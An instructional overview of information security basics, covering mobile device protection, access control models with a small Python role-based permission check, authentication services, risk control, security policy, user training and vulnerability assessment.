Mobile devices are used in many locations outside the business's normal physical perimeter, and numerous risks come with that. These devices often connect through public external networks beyond the control of the business, where attackers can eavesdrop on communications and view sensitive data. A device with GPS can reveal the location of the person carrying it, which could expose the user to a targeted physical attack. Mobile devices are designed to acquire and install apps easily from a range of sources, and in some instances those apps lack security features. The two dominant mobile operating systems, Apple iOS and Google Android, differ greatly in design and in their levels of security. Mobile devices can also reach untrusted apps that other types of computing devices usually cannot.
SECURE A MOBILE DEVICE
Quite a few settings need to be considered when a mobile device is initially set up. It is best to disable unused features: turn off those that serve no business purpose and are seldom used. A lock screen prevents the device from being used until the correct passcode is entered, and some devices can be configured so that after a limited number of failed passcode attempts (for example, by someone trying to guess the code) extra protections activate. Mobile devices that store sensitive data must have that data encrypted. A key to securing mobile devices is controlling access to the device and its data by restricting who is authorized to access it; at the business level, decisions must be made about who may access data before it is downloaded onto a mobile device.
MOBILE DEVICE APP SECURITY
Mobile device apps must also be secured. Mobile Device Management (MDM) can provide application whitelisting, ensuring that only preapproved apps can run on the device, and geo-fencing, which uses the device's GPS to define geographical boundaries within which an app may function. MDM tools allow a device to be managed remotely: in general, MDM involves a server component that sends management commands to the mobile devices and a client component running on each device that receives and carries them out. If a device is lost or stolen, various features can be activated to locate it and limit the damage; many are available through MDM, the operating system, or an installed third-party app. If the device cannot be recovered, a remote wipe should be executed to erase the sensitive information stored on it.
ACCESS CONTROL FUNDAMENTALS
Access control is the process by which access to resources or services is granted or denied. Physical access control involves protections that limit access to devices, whereas technical access control consists of the technology restrictions that regulate which data users on computers may access. Hardware and software provide an established framework that the administrator can use to control access, known as an access control model. The four major access control models are:
- Discretionary Access Control (DAC) – the user has full control over any objects they own.
- Mandatory Access Control (MAC) – the end user cannot modify any security settings.
- Role Based Access Control (RBAC) – security settings are assigned according to the user’s job function.
- Rule Based Access Control – roles are assigned dynamically based on a set of rules.
IMPLEMENT ACCESS CONTROL
Access control can be implemented with access control lists (ACLs), sets of permissions attached to an object. ACLs describe which employees can access which objects and specify which operations they may perform. Group Policy, a Microsoft Windows feature, provides centralized management and configuration of computers that use Active Directory. Time of day restrictions regulate when a user can log into a system and access resources. Account expiration specifies when a user’s account ceases to be valid.
BEST PRACTICES FOR IMPLEMENTING ACCESS CONTROL:
- Separation of Duties – dividing a process between two or more individuals
- Job Rotation – periodically moving workers from one job responsibility to another
- Using the Principle of Least Privilege – giving users only the minimum privileges necessary to perform their job functions
- Using Implicit Deny – rejecting access unless it is specifically granted
- Mandatory Vacations – requiring that employees take periodic vacations
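The access control mechanisms and best practices above, combined in one added example that is not code from the original text: a role-based permission table (an ACL keyed by role), an account expiration date and a time-of-day window on each account, implicit deny (nothing passes unless a rule explicitly grants it), least privilege (only the operations a role grants) and separation of duties (the clerk who creates an invoice may not approve it). The roles, accounts, invoices and business hours are constructed sample data.

```python
from dataclasses import dataclass
from datetime import datetime, time

# Constructed RBAC table: role -> set of (object kind, operation) it may perform.
ROLE_PERMISSIONS = {
    "clerk":   {("invoice", "create"), ("invoice", "read")},
    "manager": {("invoice", "read"), ("invoice", "approve")},
}

@dataclass
class Account:
    name: str
    roles: frozenset
    expires: datetime      # account expiration
    hours: tuple           # time-of-day restriction: (start, end) when access is allowed

@dataclass
class Invoice:
    invoice_id: str
    created_by: str
    kind: str = "invoice"

def check_access(acct: Account, obj, op: str, now: datetime):
    """Return (allowed, reason). Nothing is allowed unless a rule explicitly
    grants it, and every restriction must pass (implicit deny)."""
    if now >= acct.expires:
        return False, "account expired"
    start, end = acct.hours
    if not start <= now.time() <= end:
        return False, "outside time-of-day window"
    # Least privilege: only operations that one of the account's roles grants.
    if not any((obj.kind, op) in ROLE_PERMISSIONS.get(r, set()) for r in acct.roles):
        return False, f"no role grants {op} on {obj.kind}"
    # Separation of duties: whoever created an invoice may not also approve it.
    if op == "approve" and obj.created_by == acct.name:
        return False, "separation of duties: creator cannot approve"
    return True, "granted"

# Constructed sample accounts, objects and timestamps for exercising the check.
BUSINESS_HOURS = (time(8, 0), time(18, 0))
ALICE = Account("alice", frozenset({"clerk"}), datetime(2030, 1, 1), BUSINESS_HOURS)
BOB = Account("bob", frozenset({"manager"}), datetime(2030, 1, 1), BUSINESS_HOURS)
CAROL = Account("carol", frozenset({"manager"}), datetime(2020, 1, 1), BUSINESS_HOURS)  # expired
INV_1 = Invoice("INV-1", created_by="alice")
INV_2 = Invoice("INV-2", created_by="bob")
NOON = datetime(2024, 3, 4, 12, 0)
NIGHT = datetime(2024, 3, 4, 22, 0)
```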
TYPES OF AUTHENTICATION SERVICES
Authentication services can be provided on a network by a dedicated authentication, authorization, and accounting (AAA) server or by an authentication server, which is a server that performs only authentication.
- RADIUS (Remote Authentication Dial In User Service) is the industry standard, with support across virtually all vendors of networking hardware. The benefit of RADIUS is that messages are never sent directly between the wireless device and the RADIUS server, which prevents an attacker from penetrating the RADIUS server directly and breaching security.
- Kerberos is an authentication system used to verify the identity of users on the network. Like RADIUS, Terminal Access Controller Access Control System (TACACS), XTACACS, and TACACS+ are protocol specifications that forward user name and password information to a centralized server.
A directory service is a database stored on the network that holds data about users and network devices, including all the resources on the network and each user’s privileges to access those resources. A directory service can grant or deny access based on that information. One protocol for using a directory service for authentication is the Lightweight Directory Access Protocol (LDAP). Security Assertion Markup Language (SAML) is an XML standard that permits secure web domains to exchange user authentication and authorization data with each other.
Risks can be placed into a few categories, such as managerial, operational, financial, compliance, environmental, technical, and strategic. There are various approaches for controlling risk:
- Modify the Response to the Risk
- Use the Simple Risk Model
- Reduce the Impact of Risk Using Types of Risk Control
- Mitigate Risk from a Managerial Perspective
Privilege management covers the procedures for managing authorizations over objects. One element of privilege management is privilege auditing: the periodic review of a user’s privileges over an object, with privileges assigned or revoked as needed.
Change management is the practice of making changes and keeping track of those changes. Without properly documented procedures, a change may undo or counteract a previous change, or even mistakenly introduce a security vulnerability. Change management strives to handle changes systematically and to provide the crucial documentation of the changes.
Incident management is the framework and functions necessary to allow incident response and incident handling within the business. The goal of incident management is to restore the normal operations as soon as possible with the least possible impact on the business.
HOW TO CONTROL RISK
An important question is how serious the impact of a risk is and how it can be reduced. Various methods are available to reduce risk. One method is to change the response to the risk rather than simply accepting it. The three responses to risk are:
- Risk Transference – making a third party responsible for the risk.
- Risk avoidance – identifying the risk and making the decision to not engage in the activity.
- Risk Mitigation – the attempt to address the risk by making it less serious.
Another method is the Simple Risk Model, in which preventive elements are considered the most effective in reducing risk, since they minimize the possibility of loss by keeping the risk from occurring at all, and therefore should be used. The basics of the Simple Risk Model are:
- Preventive – controls used to prevent the loss or harm from occurring based on the risk
- Detective – controls used to monitor activity to identify instances where practices or procedures were not followed
- Corrective – controls used to restore the system to the state it was in before a malicious event occurred
SECURITY POLICIES CAN REDUCE RISK
A security policy defines the protections that must be put in place to ensure that the business’s assets face minimal risk. A security policy, combined with the associated procedures, standards, and guidelines, is crucial to implementing information security in a business. Maintaining a written security policy allows a business to take appropriate action to protect its data. A security policy serves several functions:
- It can serve as a formal expression of management’s overall intention and direction.
- It communicates the information security culture and acceptable information security behavior.
- It describes specific risks and provides directions that management can use to monitor employee behavior.
- It can generate a security-aware office culture.
- It can make sure that employee behavior is focused and supervised in compliance with security requirements.
AWARENESS & TRAINING INCREASE SECURITY
User awareness is a critical component of security. Awareness and training include instruction regarding compliance, secure user practices, and an awareness of threats. An important part of information security is to provide security awareness and training to users. All computer users in the organization share responsibility for protecting the assets of the business. It should not be expected that all users already have the understanding and skill to protect those assets. Rather, users require training in the importance of securing information, the role they play in security, and the steps required to prevent attacks. User awareness and training must be ongoing because new attacks appear regularly and new security vulnerabilities are continuously being exposed. There are techniques that should be taken into consideration to make the training informative and useful.
All employees require continuous training in new security defenses and need to be reminded of company security policies and procedures. Reasons for security education and training:
- New Employee Is Hired
- Computer Attack Has Occurred
- Employee Is Promoted or Given New Responsibilities
- During Yearly Departmental Leave
- New Software Is Installed
- Hardware Is Upgraded
Vulnerability assessment is a careful and systematic assessment of the exposure of assets to attackers, forces of nature, and any other entity that could cause harm. Vulnerability assessment tries to determine what assets need to be protected, what the threats are against those assets, how vulnerable the current protection is, and what risk could result from the threats. Once the assessment is complete, risk mitigation can take place.
VULNERABILITY ASSESSMENT IS IMPORTANT
Because successful attacks are to be expected, organizations must protect their businesses by reasonably assessing their vulnerabilities, evaluating how an attacker could penetrate their security, and then taking preventive measures to defend against those attacks.
Practically all security experts say that it is not a matter of if an attack will penetrate security, but only a matter of when. Purchasing expensive security devices, installing the latest antimalware software, conducting employee training sessions, and hiring a staff of security technicians can produce a false sense of security and protection. While each of these defenses is vital, they are of limited value unless they are correctly applied. Security hardware and software must be properly installed, configured, and maintained. Employee training must be ongoing, with a feedback system that measures its effectiveness. Security technicians require constant training on the latest attacks and defenses. Simply having the right security products does not guarantee a secure system.
VULNERABILITY SCANNING AND PENETRATION TESTING
A vulnerability scan examines a system for known security vulnerabilities and generates a report of those possible exposures. It assesses current security through a passive process and does not attempt to exploit any vulnerabilities it discovers. Vulnerability scans are typically performed from within the security perimeter and are not intended to interrupt the normal operation of the network and devices. These scans are conducted with an automated software package that assesses the system for known vulnerabilities by passively analyzing the security controls. Penetration testing, by contrast, is designed to exploit any vulnerabilities found in systems. Penetration testers do not rely on automated software in the way that vulnerability scanning does. Testers are typically external to the security perimeter and may even interrupt the operation of the network and devices rather than passively searching for a known vulnerability.
MITIGATING AND DETERRING ATTACKS
Various standard techniques can be applied to mitigate and deter attacks. A security posture is an organization’s attitude toward security; a strong security posture stems from a sound and effective approach to managing risk. Crucial to mitigating and deterring attacks is the selection of appropriate controls and the correct configuration of those controls. One group of controls consists of those that can detect or prevent attacks. The purpose of hardening is to remove as many security risks as possible and make the system more secure. Reporting can provide information about the events that occur so that action can be taken; it can also include information on trends that may reveal an even more serious threat.